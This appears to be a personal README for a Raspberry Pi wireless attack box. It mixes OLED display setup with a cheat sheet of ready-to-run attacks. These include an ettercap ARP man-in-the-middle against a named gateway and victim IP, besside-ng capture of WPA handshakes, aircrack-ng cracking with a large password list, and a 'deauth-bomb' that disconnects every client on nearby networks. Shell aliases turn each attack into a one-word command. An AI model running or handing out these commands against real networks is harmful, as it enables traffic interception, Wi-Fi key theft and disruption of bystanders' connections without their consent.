OS: Debian GNU/Linux 11 (bullseye)
/$$ /$$ /$$
| $$ | $$ |__/
| $$$$$$$ /$$$$$$ /$$$$$$$| $$ /$$ /$$$$$$ /$$
| $$__ $$ |____ $$ /$$_____/| $$ /$$/ /$$__ $$| $$
| $$ \ $$ /$$$$$$$| $$ | $$$$$$/ | $$ \ $$| $$
| $$ | $$ /$$__ $$| $$ | $$_ $$ | $$ | $$| $$
| $$ | $$| $$$$$$$| $$$$$$$| $$ \ $$| $$$$$$$/| $$
|__/ |__/ \_______/ \_______/|__/ \__/| $$____/ |__/
| $$
| $$
|__/
AUTO-H#CKS:
------------------------------------------------------------
auto-wlan-scan # airodump-ng wlan1
auto-wlan-crack # besside-ng wlan1
auto-deauth # wifi-deauth-rpi-wardrive/attack.py
auto-wpa-crack # aircrack-ng ~/SecLists/
hack responsibly /|\ ^._.^ /|\
Setup and use the 1.3" OLED Display HAT for Raspberry Pi by Waveshare
sudo apt-get update
sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
sudo pip3 install --upgrade pip
sudo pip3 install --upgrade luma.oled
sudo pip3 install smbus
sudo apt-get install python3-numpy
sudo apt-get install libopenjp2-7
sudo apt install libtiff5
sudo raspi-config
Go to:
'Interfacing Options'
Go to:
'SPI'
Choose:
'Yes'
Go to:
'Interfacing Options'
Go to:
'I2C'
Choose:
'Yes'
sudo nano /etc/rc.local
Add the following line JUST ABOVE exit 0, assuming monitor.py is in /home/pi/
:
python /home/pi/monitor.py &
IMPORTANT! Don't forget the
&
character at the end!
Some of the attacks that can be run from the pi
recon:
sudo nmap -sn 172.16.10.0/24
start MiM attack
sudo ettercap -T -S -i wlan1 -M arp:remote /172.16.10.254// /172.16.10.92// -w dump.pcap
Explanation:
-T
text only
-S
no ssh
-i
interface
-M
man in the middle
arp:remote
protocol
/default gateway//
/victim ip//
-w
dump to pcap format
Scan for vulnerable networks:
airodump-ng wlan1
Launch WPA attack on target
besside-ng wlan1 -c 11 -b 74:82:C1:9E:D1:B1
Explanation:
-c
channel
-b
bssid
Beware! running the latest version of besside-ng causes some issues where you receive bad packets.
Make sure you're running aircrack-ng version 1.5.2 and put the package on hold so it wont update:
sudo apt-mark hold aircrack-ng
after getting the wpa handshakes stored in wpa.cap, we can now let aircrack-ng try and crack the key:
aircrack-ng wpa.cap -w ~/passwordlist.txt
Basically a deauth-bomb. it will look for nearby networks and try to de-authenticate all clients connected to it.
Simply follow the steps in this github repo
Added below to ~/.bash_aliases
for easy access to the attacks:
alias auto-wlan-crack='sudo besside-ng wlan1'
alias auto-deauth='sudo python3 /home/rowadmin/attacks/wifi-deauth-rpi-wardrive/attack.py'
alias auto-wlan-scan='sudo airodump-ng wlan1'
alias auto-wpa-crack='sudo aircrack-ng wpa.cap -w ~/SecLists/Passwords/xato-net-10-million-passwords-1000000.txt'